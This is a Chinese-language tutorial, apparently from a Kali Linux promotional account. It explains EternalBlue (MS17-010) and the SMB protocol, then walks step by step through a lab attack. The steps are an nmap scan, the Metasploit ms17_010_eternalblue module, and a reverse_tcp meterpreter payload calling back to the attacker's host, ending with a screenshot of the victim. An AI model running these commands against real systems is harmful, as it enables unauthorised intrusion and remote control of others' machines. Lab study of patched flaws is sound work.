課前聲明:
1、本分享僅做學習交流,請自覺遵守法律法規!
2、搜索:Kali與編程,學習更多網絡攻防乾貨!
基礎知識介紹:
1.何為永恆之藍?
永恆之藍(Eternal Blue)爆發於2017年4月14日晚,是一種利用Windows系統的SMB協議漏洞來獲取系統的最高權限,以此來控制被入侵的計算機。甚至於2017年5月12日, 不法分子通過改造「永恆之藍」製作了wannacry勒索病毒,使全世界大範圍內遭受了該勒索病毒,甚至波及到學校、大型企業、政府等機構,只能通過支付高額的贖金才能恢復出文件。不過在該病毒出來不久就被微軟通過打補丁修復。
2.什麼是SMB協議?
SMB(全稱是Server Message Block)是一個協議伺服器信息塊,它是一種客戶機/伺服器、請求/響應協議,通過SMB協議可以在計算機間共享文件、印表機、命名管道等資源,電腦上的網上鄰居就是靠SMB實現的;SMB協議工作在應用層和會話層,可以用在TCP/IP協議之上,SMB使用TCP139埠和TCP445埠。
攻擊步驟:
一、確定攻擊目標
1.1 使用kali打開nmap掃描目標主機。
使用nmap執行命令nmap -sS -A 192.168.17.149
-sS(使用SYN掃描),-A(啟用作業系統檢測和版本檢測)。
1.2 根據我們的掃描結果可以大致判斷該系統可能存在永恆之藍漏洞。
二、攻擊步驟
2.1 執行命令:msfconsole打開metasploit。
2.2 執行命令:search ms17_010查詢我們所需要的攻擊模塊。
2.3 找到我們需要的攻擊模塊後執行命令。
use exploit/windows/smb/ms17_010_eternalblue
2.4 執行命令: search payload查找我們需要的payload。
2.5 接下來我們利用該payload。
執行命令:
set payload windows/x64/meterpreter/reverse_tcp。
2.6 執行命令:show options來查看我們所需要設置的參數。
其中RHOSTS(被攻擊計算機IP)和LHOST(自己kali IP)是需要自己設置。
2.7 執行命令:set LHOST 192.168.17.148,set RHOSTS 192.168.17.149即可。
2.8 在設置好一切之後只需要執行命令: exploit即可自動開始攻擊。出現截圖中的顯示就表示已經攻擊成功了。
2.9 我們只需要執行help即可查看我們能夠執行哪些操作。
最後我們執行了meterpreter > screenshot對被攻擊對象進行了屏幕截圖測試。
PS:到此學習完畢,謝謝觀看,獲取更多乾貨請持續關注本號!
辛苦原創,各位看官記得好評加關注哦!你也可搜索:Kali與編程,學習更多Kali Linux滲透與白帽編程技巧哦!